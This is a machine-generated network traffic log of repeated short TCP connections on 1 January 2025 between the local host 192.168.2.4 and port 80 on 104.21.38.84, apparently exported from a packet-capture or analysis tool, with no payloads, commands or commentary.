                                                                                                                          Jan 1, 2025 04:22:55.584225893 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.589138031 CET8049809104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.671962023 CET8049809104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.724802971 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.933850050 CET8049809104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.974775076 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.048530102 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.053452969 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.053607941 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.053711891 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.058445930 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.412399054 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.417263031 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.532259941 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.586132050 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.781194925 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.840523958 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.987538099 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.992300034 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.992969990 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.997308016 CET8049810104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.997364044 CET4981080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.997793913 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:56.997855902 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:56.998074055 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.002902985 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.349886894 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.354713917 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.477719069 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.521676064 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.733666897 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.787250996 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.846030951 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.846436024 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.971324921 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.971385956 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.971468925 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.971611023 CET8049812104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:57.971676111 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.971676111 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.971678972 CET4981280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:57.976552010 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.318742037 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.323580027 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.415847063 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.459127903 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.683269978 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.740406990 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.798151016 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.798794031 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.803126097 CET8049818104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.803193092 CET4981880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.803599119 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:58.803657055 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.803731918 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:58.808535099 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.162355900 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.167201042 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.274080992 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.318506002 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.467876911 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.521632910 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.750632048 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.751564026 CET4983080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.755722046 CET8049824104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.755768061 CET4982480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.756375074 CET8049830104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.756424904 CET4983080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.756567955 CET4983080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.761369944 CET8049830104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.850560904 CET4983080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.851151943 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.855930090 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.855990887 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.856102943 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.860882998 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.895750046 CET8049830104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.969575882 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.974370003 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:59.974433899 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.974498987 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:59.979255915 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.111780882 CET8049830104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.114494085 CET4983080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.209404945 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.214253902 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.214360952 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.318958044 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.320178986 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.323801041 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.365375042 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.449989080 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.506006002 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.580270052 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.631021976 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.711957932 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.756026030 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.829137087 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.829149008 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.829755068 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.834127903 CET8049836104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.834398985 CET8049837104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.834456921 CET4983680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.834469080 CET4983780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.834497929 CET8049843104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:00.834551096 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.834613085 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:00.839345932 CET8049843104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:01.193625927 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.198442936 CET8049843104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:01.296940088 CET8049843104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:01.349769115 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.553164959 CET8049843104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:01.599760056 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.673804998 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.678607941 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:01.679495096 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.679579020 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:01.684392929 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.084749937 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.089628935 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.143409014 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.193514109 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.447218895 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.490381002 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.649308920 CET4984380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.654762030 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.655481100 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.659826040 CET8049849104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.659877062 CET4984980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.660336018 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:02.660396099 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.660526991 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:02.665287971 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.006112099 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.011213064 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.136310101 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.177889109 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.405447960 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.459140062 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.517224073 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.517846107 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.522203922 CET8049855104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.522273064 CET4985580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.522773027 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.522866964 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.522952080 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.527791977 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.881078959 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:03.885929108 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:03.976736069 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.021681070 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.153059959 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.209148884 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.268364906 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.268987894 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.273375034 CET8049861104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.273468018 CET4986180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.273789883 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.273843050 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.273948908 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.278739929 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.631125927 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.636027098 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.745924950 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.787269115 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:04.933684111 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:04.974850893 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.047718048 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.048294067 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.052844048 CET8049867104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.052926064 CET4986780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.053054094 CET8049873104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.053117990 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.053215981 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.057941914 CET8049873104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.412986040 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.417881966 CET8049873104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.506058931 CET8049873104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.552901030 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.585077047 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.585249901 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.590002060 CET8049873104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.590044022 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.590065956 CET4987380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.590101957 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.590198040 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.594952106 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.705456018 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.710364103 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.711505890 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.716526031 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.721313953 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.943614960 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:05.948484898 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:05.948496103 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.061239958 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.068614006 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.073450089 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.115497112 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.163072109 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.209250927 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.226793051 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.271657944 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.342935085 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.396640062 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.472213984 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.472275972 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.473056078 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.478023052 CET8049879104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.478033066 CET8049880104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.478041887 CET8049886104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.478069067 CET4987980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.478079081 CET4988080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.478135109 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.478281021 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.483088017 CET8049886104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.834348917 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:06.839261055 CET8049886104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.931442976 CET8049886104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:06.974783897 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.190675974 CET8049886104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:07.240411043 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.314075947 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.318950891 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:07.319014072 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.319097042 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.323905945 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:07.678096056 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:07.682910919 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:07.791454077 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:07.834228992 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.072086096 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.115403891 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.190440893 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.190619946 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.195466042 CET8049892104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.195480108 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.195538044 CET4989280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.195574999 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.197552919 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.202300072 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.553117990 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.558027029 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.649007082 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.693595886 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.828150988 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.881046057 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.953475952 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.954158068 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.958493948 CET8049900104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.958559036 CET4990080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.958961964 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:08.959016085 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.959197998 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:08.963943958 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.318656921 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.323405027 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.403636932 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.459161997 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.675461054 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.724781990 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.797995090 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.798469067 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.803045988 CET8049907104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.803323984 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:09.803381920 CET4990780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.803411961 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.805551052 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:09.810374022 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.162489891 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.167310953 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.332947016 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.381037951 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.580287933 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.631042957 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.704390049 CET4988680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.707973957 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.708236933 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.713022947 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.714281082 CET8049913104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:10.714366913 CET4991380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.714380026 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.714535952 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:10.719316959 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.075978041 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.080809116 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.160233021 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.209163904 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.263356924 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.267575979 CET4992480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.377130985 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.377177954 CET8049924104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.377196074 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.377248049 CET4992480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.377294064 CET8049920104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.377338886 CET4992080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.384419918 CET4992480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.389343023 CET8049924104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.507708073 CET4992680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.512559891 CET8049926104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.512645006 CET4992680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.512729883 CET4992680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.517523050 CET8049926104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.740489006 CET4992480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.745378971 CET8049924104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.745414019 CET8049924104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.841310024 CET8049924104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.865504980 CET4992680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.870402098 CET8049926104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:11.896663904 CET4992480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:11.957269907 CET8049926104.21.38.84192.168.2.4
